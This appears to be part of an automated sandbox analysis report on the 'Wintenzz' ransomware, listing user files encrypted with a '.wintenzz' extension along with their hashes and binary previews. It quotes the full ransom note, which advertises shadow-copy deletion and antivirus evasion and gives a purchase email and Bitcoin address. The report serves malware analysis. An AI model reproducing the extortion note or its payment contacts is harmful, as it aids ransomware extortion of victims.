SHA1:	C2D8080571804E202EF1658AA02A451BB6601E98
SHA-256:	16F7C8334FCCC2E9ADF8E78B6FD11E013D6C0407BD5B9CBD869A869A7E3E9156
SHA-512:	546B34672CB29A0C5C10AA6745FE6C7393D7D5C4E1F988DF1D385FCFE69F4DE4B12E17EB20180FE960F3335E9E98D7B2CD2A3023EAD01A5F397FE9060D5A3EEB
Malicious:	false
Preview:	................gLGQ1loJ84XvuOv4RIpotiO0........:.Y.u..qa.../}. D.....:......<l..W......m.......J]...;..j.."({#.v.....;....W._@6#..R.Y.;/.u..........s-..v....0.k.Lj..Z......3...r...7...'6..[!....D\..Yf>I.(fvH..z^.<.&.X.m......\.Q........ h...u..Z..xJwS_.......(......4j.w...^..P...#...G...'..v.(.r.....v.......D......9..}:....X........).E.Y.5x....1..'.)X.'.n.....8.K.I..lW......OTnZ}.k...i#.k.._.y...B@R*\ZZ..Yc.1{G.....&I,>..T[..b.N..J:.Fq...]:Y........slt..i.,..@b!._./ps5.`Z..n...U....."...$...g.....!....4.d.E....RB......i..t..z.v..a.}........<L.b...N.i..w.v#...Rt.........9...,..kh.!Fa...G:.....g.N.O......so.._....@.G........%....~...V[......`]Q..>...nD..:...c.....$.2.,7..{..U......y.6;=$]krq......T\|b.fEMmq..S.S.:..".~}.nf.bi..t.X.O...htR.I...Q_.U...V..{'......d..Q...............R\|..{b.i...qf....P.~......b...:..8>!.z\&...m.....p.s.0{....G...8.<E..y.W.....AA.<.x...AOc)..........4E.VjQ+6...J....A.]..i...S..O.Y3.%C].5hG.l...l3.....

C:\Users\user\Desktop\BQJUWOYRTO.mp3.wintenzz Download File
Process:	C:\Users\user\Desktop\IJht2pqbVh.exe
File Type:	data
Category:	dropped
Size (bytes):	1090
Entropy (8bit):	7.812466537563609
Encrypted:	false
SSDEEP:	24:tOfYyavNkGB88uRgfgiK1Dy6O3txp5hwNyAHjM++D:tQNavrbgiMy6O9xp8yE+D
MD5:	200840B98ECDECCC2781CED7A0A2F25A
SHA1:	C2D8080571804E202EF1658AA02A451BB6601E98
SHA-256:	16F7C8334FCCC2E9ADF8E78B6FD11E013D6C0407BD5B9CBD869A869A7E3E9156
SHA-512:	546B34672CB29A0C5C10AA6745FE6C7393D7D5C4E1F988DF1D385FCFE69F4DE4B12E17EB20180FE960F3335E9E98D7B2CD2A3023EAD01A5F397FE9060D5A3EEB
Malicious:	false
Preview:	................gLGQ1loJ84XvuOv4RIpotiO0........:.Y.u..qa.../}. D.....:......<l..W......m.......J]...;..j.."({#.v.....;....W._@6#..R.Y.;/.u..........s-..v....0.k.Lj..Z......3...r...7...'6..[!....D\..Yf>I.(fvH..z^.<.&.X.m......\.Q........ h...u..Z..xJwS_.......(......4j.w...^..P...#...G...'..v.(.r.....v.......D......9..}:....X........).E.Y.5x....1..'.)X.'.n.....8.K.I..lW......OTnZ}.k...i#.k.._.y...B@R*\ZZ..Yc.1{G.....&I,>..T[..b.N..J:.Fq...]:Y........slt..i.,..@b!._./ps5.`Z..n...U....."...$...g.....!....4.d.E....RB......i..t..z.v..a.}........<L.b...N.i..w.v#...Rt.........9...,..kh.!Fa...G:.....g.N.O......so.._....@.G........%....~...V[......`]Q..>...nD..:...c.....$.2.,7..{..U......y.6;=$]krq......T\|b.fEMmq..S.S.:..".~}.nf.bi..t.X.O...htR.I...Q_.U...V..{'......d..Q...............R\|..{b.i...qf....P.~......b...:..8>!.z\&...m.....p.s.0{....G...8.<E..y.W.....AA.<.x...AOc)..........4E.VjQ+6...J....A.]..i...S..O.Y3.%C].5hG.l...l3.....

C:\Users\user\Desktop\BQJUWOYRTO.pdf Download File
Process:	C:\Users\user\Desktop\IJht2pqbVh.exe
File Type:	data
Category:	dropped
Size (bytes):	1090
Entropy (8bit):	7.793767442197981
Encrypted:	false
SSDEEP:	24:X6xXR4dhlzzL6WUl1DRabUkHzB3+gExU+ZY/fY6RhpOkNA:XCXR4dTzP6WUnRa4kHlmzYHnOkNA
MD5:	FD87C5BC96431DAA3014A6FA15059EE4
SHA1:	F16D6AE1169F5BFCA2987C635AF76E5A8344C878
SHA-256:	E040B1B8A1665DB1FBCC47C010AF236D631182FEDE7ECCB145ED83D17823FE8A
SHA-512:	B1210D4EE003D6C95D277E2076ABCEC84F35E6FC26CC9BBDD323F6D4772C483920DC03D581D13A0A21173447C24EC04AF4F023D89956C96202C84162BA02414E
Malicious:	false
Preview:	................cVRP6e3ITVZhrUHNaVFUez10..........pHK....q).S.c...AS...>'.[.{in.O....7.....%sG%..D5S.MnT.#.JT......G_.....H`.w...B....! .}..\|.}1.{......z.M.Q...y.(.B..q.ui...l.=.....'.)N'`..S.mg....~.'pq.W..$.$G..?.B...b.0.._..}.P...{.!....^rk.@..y..]{...aO{..........vT.Y".b..n..p0....{.<.D.^F[.r.._..=d....g.2.}(v...\|......."...........@=...E.....Q.....x..M.T..x9..C.WT.T..PV.3D....9.......{]X'7B^....<.9..+..S7z....D.5S........I..eU..T.N....x...N..>..%.4.jV...N.Ob=.R...)..Z.9K..#.....y-....>.D.n.W.........?[l....y..&..1.l,..7O2.^S...&..B........'.aF...'/....h.J5p,G....\M..j9O=.T.fA..9..d.<.`..>T.TK+.&....5..g..0.T&m...}G.b.{9.2...[..h..\C.....y.1=D.iU_...Y...:-.D...M.:`.K....G............/......"'p4.......}..I...q.W..i..i.~..........a......O/K+..E...}.v..9...jj:...Lp.i.w....y......x.p.,.`..u..3..u<...q..Mf....2,...G.4..[f.0.e......dw5.HA.,.bT.t....gJ....S+....I.....I7I.F..s..aK...W..WkV...06.....\.^Y..."7.....e......R..A2&..?....R(......

C:\Users\user\Desktop\BQJUWOYRTO.pdf.wintenzz Download File
Process:	C:\Users\user\Desktop\IJht2pqbVh.exe
File Type:	data
Category:	dropped
Size (bytes):	1090
Entropy (8bit):	7.793767442197981
Encrypted:	false
SSDEEP:	24:X6xXR4dhlzzL6WUl1DRabUkHzB3+gExU+ZY/fY6RhpOkNA:XCXR4dTzP6WUnRa4kHlmzYHnOkNA
MD5:	FD87C5BC96431DAA3014A6FA15059EE4
SHA1:	F16D6AE1169F5BFCA2987C635AF76E5A8344C878
SHA-256:	E040B1B8A1665DB1FBCC47C010AF236D631182FEDE7ECCB145ED83D17823FE8A
SHA-512:	B1210D4EE003D6C95D277E2076ABCEC84F35E6FC26CC9BBDD323F6D4772C483920DC03D581D13A0A21173447C24EC04AF4F023D89956C96202C84162BA02414E
Malicious:	false
Preview:	................cVRP6e3ITVZhrUHNaVFUez10..........pHK....q).S.c...AS...>'.[.{in.O....7.....%sG%..D5S.MnT.#.JT......G_.....H`.w...B....! .}..\|.}1.{......z.M.Q...y.(.B..q.ui...l.=.....'.)N'`..S.mg....~.'pq.W..$.$G..?.B...b.0.._..}.P...{.!....^rk.@..y..]{...aO{..........vT.Y".b..n..p0....{.<.D.^F[.r.._..=d....g.2.}(v...\|......."...........@=...E.....Q.....x..M.T..x9..C.WT.T..PV.3D....9.......{]X'7B^....<.9..+..S7z....D.5S........I..eU..T.N....x...N..>..%.4.jV...N.Ob=.R...)..Z.9K..#.....y-....>.D.n.W.........?[l....y..&..1.l,..7O2.^S...&..B........'.aF...'/....h.J5p,G....\M..j9O=.T.fA..9..d.<.`..>T.TK+.&....5..g..0.T&m...}G.b.{9.2...[..h..\C.....y.1=D.iU_...Y...:-.D...M.:`.K....G............/......"'p4.......}..I...q.W..i..i.~..........a......O/K+..E...}.v..9...jj:...Lp.i.w....y......x.p.,.`..u..3..u<...q..Mf....2,...G.4..[f.0.e......dw5.HA.,.bT.t....gJ....S+....I.....I7I.F..s..aK...W..WkV...06.....\.^Y..."7.....e......R..A2&..?....R(......

C:\Users\user\Desktop\BUFZSQPCOH.png Download File
Process:	C:\Users\user\Desktop\IJht2pqbVh.exe
File Type:	data
Category:	dropped
Size (bytes):	1090
Entropy (8bit):	7.781018276181525
Encrypted:	false
SSDEEP:	24:CRBMyXY7J/0YykQcoMItkv/Y8x/b5Mo2CgPxT+t:C/MIsJ/VGtiZ93IB+t
MD5:	D13409CAEAA48FA52F0D129CF390BBE9
SHA1:	69BE0E12AF2C20CB0FB0B62C8C39FF7410AD3C46
SHA-256:	8D2BEE3B5BC1B7B93FBD1C8342260E52A9941DD39A9A472BC0BB386739570BB7
SHA-512:	7990F7D3F9F315AD77A9B93F1707661A4A4253836E548296155D914A1BC88535C01851B3C0701A3EA921EE32B2E7AAD1DBCF6B6C16C9F6969A81EFE54FCBB758
Malicious:	false
Preview:	................4hV31kUUm9TRqKLTlFIxbYfg........C.-..J..c.....zC...U......5.-NR....#....D?..S..=d..A..[[...N.....D.{U...._..d....O6...2.^..f.......G..S}..K;g..n^/S....Bo......vL..4.hUf.R..@....<.B\|.RL3R.m...v.(.]....'....r...s..u....n..b!....qjs<.L......:..}..-.......Z.....`..N<.g"..6vu0...Sg.{;D.(Z.v...{.z..Z#..vT~.M..<e...7.S...l.6.....kN..y...R.%...n....=8A..`.0`..q)..$.t.._..{M.x.7zx.P:LK..Z..R.Jm\je..kQ61D..E>?.!-.9..7..sI....I...&..P.@....-.a.g-..FU'z.rl..<l....$.F.5..R.#2A/3&.]{!5."c./..&....nwl.....pt-.#.g;....5.!.cs........./W.N..r.p4...{..."......x....R....h.....0..g.`.^+P...x...?o.... .\|..b......:vQ..i.&Ws.2S..XX%...!A.........d.5;..6..I.\|...4..5q...GS./...#`...?H..M.-.Q..V6..jN..!..[`...-...q....\|.WY....o)..T~."..'Y....o......D..0$....9(..... ..u.ZMx)..Uo0e_.J.....!-...t...A+.._(B.:.!? .gU,..!..&...v&..$..b.G.\|/7I2...D.5.....C.!h..m.bS.!..;..'P.3K...=.&..F.f.q.u......7-..c.k.(....h..3.C..!O..n.&.....>...f.>.f.Rl.Ov.S......l.

C:\Users\user\Desktop\BUFZSQPCOH.png.wintenzz Download File
Process:	C:\Users\user\Desktop\IJht2pqbVh.exe
File Type:	data
Category:	dropped
Size (bytes):	1090
Entropy (8bit):	7.781018276181525
Encrypted:	false
SSDEEP:	24:CRBMyXY7J/0YykQcoMItkv/Y8x/b5Mo2CgPxT+t:C/MIsJ/VGtiZ93IB+t
MD5:	D13409CAEAA48FA52F0D129CF390BBE9
SHA1:	69BE0E12AF2C20CB0FB0B62C8C39FF7410AD3C46
SHA-256:	8D2BEE3B5BC1B7B93FBD1C8342260E52A9941DD39A9A472BC0BB386739570BB7
SHA-512:	7990F7D3F9F315AD77A9B93F1707661A4A4253836E548296155D914A1BC88535C01851B3C0701A3EA921EE32B2E7AAD1DBCF6B6C16C9F6969A81EFE54FCBB758
Malicious:	false
Preview:	................4hV31kUUm9TRqKLTlFIxbYfg........C.-..J..c.....zC...U......5.-NR....#....D?..S..=d..A..[[...N.....D.{U...._..d....O6...2.^..f.......G..S}..K;g..n^/S....Bo......vL..4.hUf.R..@....<.B\|.RL3R.m...v.(.]....'....r...s..u....n..b!....qjs<.L......:..}..-.......Z.....`..N<.g"..6vu0...Sg.{;D.(Z.v...{.z..Z#..vT~.M..<e...7.S...l.6.....kN..y...R.%...n....=8A..`.0`..q)..$.t.._..{M.x.7zx.P:LK..Z..R.Jm\je..kQ61D..E>?.!-.9..7..sI....I...&..P.@....-.a.g-..FU'z.rl..<l....$.F.5..R.#2A/3&.]{!5."c./..&....nwl.....pt-.#.g;....5.!.cs........./W.N..r.p4...{..."......x....R....h.....0..g.`.^+P...x...?o.... .\|..b......:vQ..i.&Ws.2S..XX%...!A.........d.5;..6..I.\|...4..5q...GS./...#`...?H..M.-.Q..V6..jN..!..[`...-...q....\|.WY....o)..T~."..'Y....o......D..0$....9(..... ..u.ZMx)..Uo0e_.J.....!-...t...A+.._(B.:.!? .gU,..!..&...v&..$..b.G.\|/7I2...D.5.....C.!h..m.bS.!..;..'P.3K...=.&..F.f.q.u......7-..c.k.(....h..3.C..!O..n.&.....>...f.>.f.Rl.Ov.S......l.

C:\Users\user\Desktop\BUY_WINTENNZ.txt Download File
Process:	C:\Users\user\Desktop\IJht2pqbVh.exe
File Type:	ASCII text
Category:	modified
Size (bytes):	777
Entropy (8bit):	4.894305310896507
Encrypted:	false
SSDEEP:	24:+qwrJXHsRRvKdLcSsXVixM2+rSyo0rIHkc2:9wrJuMgRNIHv2
MD5:	D20958E6F6679BFE78D6080C19630B53
SHA1:	774C66D11596AB423A83311532652700556031EC
SHA-256:	AF7238B05EBFBE78EA5FA21E043F1CFC5F2679C615EE8AD5B65CA249EE1EAB4A
SHA-512:	EAC9FA4A5DF27D857C5B4C669A7BF6A739E0B9B8730BB633A77EB6148437568171C5FC6144F589F64500352E487C2F4D644BD92577B8ACE0B898472CEE3A888C
Malicious:	false
Preview:	THIS COMPUTER WAS ENCRYPTED BY THE WINTENZZ SECURITY TOOL... Wintennz is a top-level encryption application capable of encrypting several files at once with fast stream-cipher data-locking... This software is capable of running on any Windows computer. Wintennz quickly locks files with an asymmetric key and prevents file recovery without the use of a password.... Features:.. -VSS (Volume Shadow Service) Full Bypass and Delete.. -File Encryption is irreversible without password.. -Secure stream cipher used to lock data.. -Virtual Machine / Antivirus evasion.. -Startup note Message and HTML Message.. -Custom Message + Custom file extension... Purchase:.. Email - servewintenzz@secmail.pro.. Bitcoin - 1HkJQdZZ2No2JyNPYkNPTnG6PPXPZ7nx5Y

C:\Users\user\Desktop\BXAJUJAOEO.docx Download File
Process:	C:\Users\user\Desktop\IJht2pqbVh.exe
File Type:	data
Category:	dropped
Size (bytes):	1090
Entropy (8bit):	7.815412836213744
Encrypted:	false
SSDEEP:	24:ne577wPC7O2XrzKlg6m/FPaUVLgYgGzn7E6g7iPE727+t8SUl3MTEk:Qz7O2XrkF0FPDi6ng6goSU+tRmcTEk
MD5:	0500AAA5D8C74681AC7D56C739843011
SHA1:	CD7EB90726EE01A84AC868F04D1FC504D011E145
SHA-256:	21FB9C29CF038DB3F8D7E1DA620EAC6A7968A254EA8C3D1B2CC755A4A037C451
SHA-512:	D5288EFEEC277BA643A7E76BDA3E0EF51D196888B688D3E17B3DE1C80C6AF72F7DAC5A9A8D8FF125DF1E60AC388EDC98340339185AF964338886014BB32F62DB
Malicious:	false
Preview:	................lV3CVorj38nk6OQnGW2eDTA2.........t/.\|...<`E.q.".....H.Q..0..r......`.D.d.6..X.....Q....-..!.[WU1x..u...X...%8.r.O.''..hs.....L.....5wh.'....K.4\..Q.....5...I?......@......]0.<<.'...-..O....U7....;._.v@...Tq..9X%........ )h...YA.+L...I. .\{....b.H.W.h..[\|..J,..Y.....f...}..Z....&.^4.. .....WD......q?.8..".%......n....#..}.B..A.hq.Y..+C.Lq.G.....1..om...q,.:(.E,..."fk.h........,..t.......m.@v.kzY[...QC....\...e............9."..IN4._..su.. .?)..}.{.\..m..H.I<...a..q....k.v....a..}...M(..-....9...@.../ .c....-j.......f.9Q.!...H.S....K...........v...B.T.......!Hfz.F.Hw...l.W.#...'.A6....}.2X..Q.!0=..v....b.....OvV.2.d.>...p.:.g;.AW.m..... ..=.F6I..T.E4...2..#.R.[F"..w0.<c~.J..Z...0....h..D..Z....oa.17?a.:...p..a...:?N..@.pUC...u.j.7..ck.:./.}.....'.'..P...].../.... !.....[...<.\|.iE.&.X?..Dl...C...S.}4.u=W.5..K2...+.:..h9u.......?.b.M@x._=...J~f.d...,.31.(..Xy...9].r......[}. A..70...l"....YQ..-......#.......X.).f.....\|E...~1.

C:\Users\user\Desktop\BXAJUJAOEO.docx.wintenzz Download File
Process:	C:\Users\user\Desktop\IJht2pqbVh.exe
File Type:	data
Category:	dropped
Size (bytes):	1090
Entropy (8bit):	7.815412836213744
Encrypted:	false
SSDEEP:	24:ne577wPC7O2XrzKlg6m/FPaUVLgYgGzn7E6g7iPE727+t8SUl3MTEk:Qz7O2XrkF0FPDi6ng6goSU+tRmcTEk
MD5:	0500AAA5D8C74681AC7D56C739843011
SHA1:	CD7EB90726EE01A84AC868F04D1FC504D011E145
SHA-256:	21FB9C29CF038DB3F8D7E1DA620EAC6A7968A254EA8C3D1B2CC755A4A037C451
SHA-512:	D5288EFEEC277BA643A7E76BDA3E0EF51D196888B688D3E17B3DE1C80C6AF72F7DAC5A9A8D8FF125DF1E60AC388EDC98340339185AF964338886014BB32F62DB
Malicious:	false
Preview:	................lV3CVorj38nk6OQnGW2eDTA2.........t/.\|...<`E.q.".....H.Q..0..r......`.D.d.6..X.....Q....-..!.[WU1x..u...X...%8.r.O.''..hs.....L.....5wh.'....K.4\..Q.....5...I?......@......]0.<<.'...-..O....U7....;._.v@...Tq..9X%........ )h...YA.+L...I. .\{....b.H.W.h..[\|..J,..Y.....f...}..Z....&.^4.. .....WD......q?.8..".%......n....#..}.B..A.hq.Y..+C.Lq.G.....1..om...q,.:(.E,..."fk.h........,..t.......m.@v.kzY[...QC....\...e............9."..IN4._..su.. .?)..}.{.\..m..H.I<...a..q....k.v....a..}...M(..-....9...@.../ .c....-j.......f.9Q.!...H.S....K...........v...B.T.......!Hfz.F.Hw...l.W.#...'.A6....}.2X..Q.!0=..v....b.....OvV.2.d.>...p.:.g;.AW.m..... ..=.F6I..T.E4...2..#.R.[F"..w0.<c~.J..Z...0....h..D..Z....oa.17?a.:...p..a...:?N..@.pUC...u.j.7..ck.:./.}.....'.'..P...].../.... !.....[...<.\|.iE.&.X?..Dl...C...S.}4.u=W.5..K2...+.:..h9u.......?.b.M@x._=...J~f.d...,.31.(..Xy...9].r......[}. A..70...l"....YQ..-......#.......X.).f.....\|E...~1.

C:\Users\user\Desktop\BXAJUJAOEO\BQJUWOYRTO.mp3 Download File
Process:	C:\Users\user\Desktop\IJht2pqbVh.exe
File Type:	data
Category:	dropped
Size (bytes):	1090
Entropy (8bit):	7.766159241389673
Encrypted:	false
SSDEEP:	24:HdHyokmJeuPCfFodDQBEmKvFZfCM/bxjWRCY:59LJziFiizKvPFDxjhY
MD5:	069AB28D136BC18C328CFCD1AAACEF42
SHA1:	137D0FD732FE8A09DB38984C2BFDBCB8EECD8A82
SHA-256:	DD3AD9847B61B07E5786A18E9E18DF01F4062DCCC7BD97417E9F4A94383E0AE9
SHA-512:	1BC76691C1AA72F28EF5A35629BA6A1B36329F13B1736D7877D7F88C8FA4B33DA146665C18F91ACDF4DEAA7C3151108E8F9DF24BE4D3584DD8A74BD194168518
Malicious:	false
Preview:	................wkrXp6OuKTi9M7gC1BSAYn1r..........x..m{..B.j.ou.].` .ha..&..\|':]:.uiv....h.u%.)]....o..D../..~.eL(n...}.q.i.+..{....o...2.u.....r..P..Cj.3...:1.r...P..'.`.I..d...3.....:.....o.i.8^.S.Kn......i..Sn..S~...T...v.=?.i.V.......jT...eA.>.v...0&.....Q.x....Q.....1w.36....Y..5...4.:.r....v....'.\|.]..@..D...$Ko.Yi.p....wf...o.../.E5..p..].....3Z..Q.......Y..S.aNI.;..!.9;...j.h.........~.:...cSJ.gX.]nE{.."co............3.rh.q.;.....D..E.,.@.P.............!..;.gm)\.C.A.f.......]......;.9.v.<1...!E...t....BX...&......W....T..R~Z...Q.@m.CO..u...i....Cv.id-...F.. ..w.....jd.;..1.zZ.9.e........i.Y...&..+..........:.............F.E.I.._t.7B~.HqmW.cFSN.,.8P....]b..q..g)W@.)..6.C0. .6=...B...C.>.....#f4......K....%1..p..uVma.=..>..%.-....D.E.B.........AM.t....O...P....\cM[;..;.....T...r.a.1R.\...\|......."`U.....p...7.+.....p.&.O:....R.r9.....DM........#..,......8l ......{5..?......c.T...........:d..^.1F.H..r..@>v.......l.57..G.*8..

C:\Users\user\Desktop\BXAJUJAOEO\BQJUWOYRTO.mp3.wintenzz Download File
Process:	C:\Users\user\Desktop\IJht2pqbVh.exe
File Type:	data
Category:	dropped
Size (bytes):	1090
Entropy (8bit):	7.766159241389673
Encrypted:	false
SSDEEP:	24:HdHyokmJeuPCfFodDQBEmKvFZfCM/bxjWRCY:59LJziFiizKvPFDxjhY
MD5:	069AB28D136BC18C328CFCD1AAACEF42
SHA1:	137D0FD732FE8A09DB38984C2BFDBCB8EECD8A82
SHA-256:	DD3AD9847B61B07E5786A18E9E18DF01F4062DCCC7BD97417E9F4A94383E0AE9
SHA-512:	1BC76691C1AA72F28EF5A35629BA6A1B36329F13B1736D7877D7F88C8FA4B33DA146665C18F91ACDF4DEAA7C3151108E8F9DF24BE4D3584DD8A74BD194168518
Malicious:	false
Preview:	................wkrXp6OuKTi9M7gC1BSAYn1r..........x..m{..B.j.ou.].` .ha..&..\|':]:.uiv....h.u%.)]....o..D../..~.eL(n...}.q.i.+..{....o...2.u.....r..P..Cj.3...:1.r...P..'.`.I..d...3.....:.....o.i.8^.S.Kn......i..Sn..S~...T...v.=?.i.V.......jT...eA.>.v...0&.....Q.x....Q.....1w.36....Y..5...4.:.r....v....'.\|.]..@..D...$Ko.Yi.p....wf...o.../.E5..p..].....3Z..Q.......Y..S.aNI.;..!.9;...j.h.........~.:...cSJ.gX.]nE{.."co............3.rh.q.;.....D..E.,.@.P.............!..;.gm)\.C.A.f.......]......;.9.v.<1...!E...t....BX...&......W....T..R~Z...Q.@m.CO..u...i....Cv.id-...F.. ..w.....jd.;..1.zZ.9.e........i.Y...&..+..........:.............F.E.I.._t.7B~.HqmW.cFSN.,.8P....]b..q..g)W@.)..6.C0. .6=...B...C.>.....#f4......K....%1..p..uVma.=..>..%.-....D.E.B.........AM.t....O...P....\cM[;..;.....T...r.a.1R.\...\|......."`U.....p...7.+.....p.&.O:....R.r9.....DM........#..,......8l ......{5..?......c.T...........:d..^.1F.H..r..@>v.......l.57..G.*8..

C:\Users\user\Desktop\BXAJUJAOEO\BXAJUJAOEO.docx Download File
Process:	C:\Users\user\Desktop\IJht2pqbVh.exe
File Type:	data
Category:	dropped
Size (bytes):	1090
Entropy (8bit):	7.796909669568618
Encrypted:	false
SSDEEP:	24:1x30SsYyBsZIZSVsthyleKtK2vx5DwfC25AsQ8OQPVP70iMQC8H74AV839:TkLYPls22uxpGC+QTQPVI1lg839
MD5:	5DE954D7A70A6A9D3EAFA9B4C8B8F0DF
SHA1:	A0AC46B3BDB78C90CA9E9CBD291BB1FADAE25C83
SHA-256:	6D7882D7AF023ECAE918F523F8857E3D84FD34F08A70794AE3A178DA0CD4EDE7
SHA-512:	EA7673DF4B11DEE3893EE794B5A8FD7212D8E5638F3BE2C4769EC2F4D2877A30744E6796DEB560D94747E10DA2DE856CF6276ACB52D1162960BB60B1A35DDB5A
Malicious:	true
Preview:	................wrFB7AA3RCYPdV2FXl2kptBx........ZW..~. W.3.Z>.P..GHf`...to.p....5........"L..H.I.Tgn...].p...5Q....]....D..2.S.h.@.=..@r...9_....=..[^..O...+.V.....5.S..LK.]\.J.4z./....a.3..kR.]...4K....h]L<......(.?r...m.z..mA..u..B.......B6.....G.}.5..S.....wGvM{.....nF).4...w_.N\|....W........^.....3.4.(..+A3\Y-.B?Amg......]=.%.........{$.22...O.CP..7_.V...:].>5g0...`p.%.....b^....c&........r.y.......fCgv.Jt.......R.@.ky..l(.&.y....S.[.....Z.\\.:Yb.........C3..;.b....<.9[.....\9.../......(hj.R....%.r..4.naAc=..OGP.A.1."eol;.R.S.>#...g\|...Gm.+......d.5.n.d.^.4@( h.?h.?j..M..8...............-....<0u.q.S..1.z.LD....'.l@..G../....-..$.53...".<.^....2.6.}.R..2M..%.P..'.-...c."...u..(...>R..[...T..y...,.J..s.....!.A...^..`'r.n......j]..!......SSW.^j......s..+./...:..c...iI6;..n..d'.<G..c.F$.....y..p.....N-.gO.j..4.....U...P...hX.'h..TT!<..S..v.og6w...%..m-$.j+JR................T.\..k.......V].....O.\|...0....$.Kb^k.].t..N;;...-....&....G..4

C:\Users\user\Desktop\BXAJUJAOEO\BXAJUJAOEO.docx.wintenzz Download File
Process:	C:\Users\user\Desktop\IJht2pqbVh.exe
File Type:	data
Category:	dropped
Size (bytes):	1090
Entropy (8bit):	7.796909669568618
Encrypted:	false
SSDEEP:	24:1x30SsYyBsZIZSVsthyleKtK2vx5DwfC25AsQ8OQPVP70iMQC8H74AV839:TkLYPls22uxpGC+QTQPVI1lg839
MD5:	5DE954D7A70A6A9D3EAFA9B4C8B8F0DF
SHA1:	A0AC46B3BDB78C90CA9E9CBD291BB1FADAE25C83
SHA-256:	6D7882D7AF023ECAE918F523F8857E3D84FD34F08A70794AE3A178DA0CD4EDE7
SHA-512:	EA7673DF4B11DEE3893EE794B5A8FD7212D8E5638F3BE2C4769EC2F4D2877A30744E6796DEB560D94747E10DA2DE856CF6276ACB52D1162960BB60B1A35DDB5A
Malicious:	false
Preview:	................wrFB7AA3RCYPdV2FXl2kptBx........ZW..~. W.3.Z>.P..GHf`...to.p....5........"L..H.I.Tgn...].p...5Q....]....D..2.S.h.@.=..@r...9_....=..[^..O...+.V.....5.S..LK.]\.J.4z./....a.3..kR.]...4K....h]L<......(.?r...m.z..mA..u..B.......B6.....G.}.5..S.....wGvM{.....nF).4...w_.N\|....W........^.....3.4.(..+A3\Y-.B?Amg......]=.%.........{$.22...O.CP..7_.V...:].>5g0...`p.%.....b^....c&........r.y.......fCgv.Jt.......R.@.ky..l(.&.y....S.[.....Z.\\.:Yb.........C3..;.b....<.9[.....\9.../......(hj.R....%.r..4.naAc=..OGP.A.1."eol;.R.S.>#...g\|...Gm.+......d.5.n.d.^.4@( h.?h.?j..M..8...............-....<0u.q.S..1.z.LD....'.l@..G../....-..$.53...".<.^....2.6.}.R..2M..%.P..'.-...c."...u..(...>R..[...T..y...,.J..s.....!.A...^..`'r.n......j]..!......SSW.^j......s..+./...:..c...iI6;..n..d'.<G..c.F$.....y..p.....N-.gO.j..4.....U...P...hX.'h..TT!<..S..v.og6w...%..m-$.j+JR................T.\..k.......V].....O.\|...0....$.Kb^k.].t..N;;...-....&....G..4

C:\Users\user\Desktop\BXAJUJAOEO\DQOFHVHTMG.pdf Download File
Process:	C:\Users\user\Desktop\IJht2pqbVh.exe
File Type:	data
Category:	dropped
Size (bytes):	1090
Entropy (8bit):	7.794259620352762
Encrypted:	false
SSDEEP:	24:8XtYAg9+MptcIXkpusv7tXGHWbDmHuhmvdkBGrehT:8dMc0tcI0PcWbu4mvxep
MD5:	D126D77110330D2122B5CFC94A7A05B3
SHA1:	F19AE2954157DC0B027F1A25BBC11272116EC19B
SHA-256:	B771A75603FAF8351CFA4BEB8B85D5201EAC9A94C6E377539E6E7BC8E3942AC6
SHA-512:	60CA1CB46350F0689244F776B3149D46C394206E7B30B4BF0B29363A1061A83C513F45A14D7F96D10DB471FFE121F1E5B30B3C2D01301F35223F2B0BCACD4F28
Malicious:	false
Preview:	................uwKbO15bezY4HZXL5CYmpjSU..........G....(..0.b..[....F...=7.`.q.z...........I2+R.#....z......E..%...`....c..P.QBm............}...dQ..k4.S6...t..vt... ...&...O.i z9am.X.e...,..[.p..../......d.5?.f...7.:GV...$..p.(1...a.m.../-!p.c.j.h8[\.,..@U..y..c..^1....S...C:.......E?f.^..Su.1.....AX.v?'.E..8....V.b....}A-....:.}..k..n..N....].Gx.. ...z=...l....j.QIQ.....v....J....!...T.....d.l".u.d...F.....q.^O:...QT.B........8.. dc..\|....]Tu.\|......P..O..".Y&.;N.........I:.;..5........f..}Ms..a.'....[S.U.!.&}3..n <Cj.c....T.D..q....D....Uf......V..{...z.z..E..D.z........^..J..N..D..`...%.....V..<....H....Y..I.f..(.+m,.....\x............Gs.IwV.....#...A.........X7...J....u.\nQ../............\|i...>.....K$[....D..]N.c\|......(.O...~..c.......y.Q......f..\.EQ.I#(s3.RL.9.......?Dk..9,.UDP..H8.p..R.b....\...g.n......!R./.KZ.mv...P..C.. .W.K.lD....n...W..*...%.{..X...RI.E.k.......d...u.m.z4..7.VE.....[..-S/..L.Ek@k......'=..`8Z.J.8...ux

C:\Users\user\Desktop\BXAJUJAOEO\DQOFHVHTMG.pdf.wintenzz Download File
Process:	C:\Users\user\Desktop\IJht2pqbVh.exe
File Type:	data
Category:	dropped
Size (bytes):	1090
Entropy (8bit):	7.794259620352762
Encrypted:	false
SSDEEP:	24:8XtYAg9+MptcIXkpusv7tXGHWbDmHuhmvdkBGrehT:8dMc0tcI0PcWbu4mvxep
MD5:	D126D77110330D2122B5CFC94A7A05B3
SHA1:	F19AE2954157DC0B027F1A25BBC11272116EC19B
SHA-256:	B771A75603FAF8351CFA4BEB8B85D5201EAC9A94C6E377539E6E7BC8E3942AC6
SHA-512:	60CA1CB46350F0689244F776B3149D46C394206E7B30B4BF0B29363A1061A83C513F45A14D7F96D10DB471FFE121F1E5B30B3C2D01301F35223F2B0BCACD4F28
Malicious:	false
Preview:	................uwKbO15bezY4HZXL5CYmpjSU..........G....(..0.b..[....F...=7.`.q.z...........I2+R.#....z......E..%...`....c..P.QBm............}...dQ..k4.S6...t..vt... ...&...O.i z9am.X.e...,..[.p..../......d.5?.f...7.:GV...$..p.(1...a.m.../-!p.c.j.h8[\.,..@U..y..c..^1....S...C:.......E?f.^..Su.1.....AX.v?'.E..8....V.b....}A-....:.}..k..n..N....].Gx.. ...z=...l....j.QIQ.....v....J....!...T.....d.l".u.d...F.....q.^O:...QT.B........8.. dc..\|....]Tu.\|......P..O..".Y&.;N.........I:.;..5........f..}Ms..a.'....[S.U.!.&}3..n <Cj.c....T.D..q....D....Uf......V..{...z.z..E..D.z........^..J..N..D..`...%.....V..<....H....Y..I.f..(.+m,.....\x............Gs.IwV.....#...A.........X7...J....u.\nQ../............\|i...>.....K$[....D..]N.c\|......(.O...~..c.......y.Q......f..\.EQ.I#(s3.RL.9.......?Dk..9,.UDP..H8.p..R.b....\...g.n......!R./.KZ.mv...P..C.. .W.K.lD....n...W..*...%.{..X...RI.E.k.......d...u.m.z4..7.VE.....[..-S/..L.Ek@k......'=..`8Z.J.8...ux

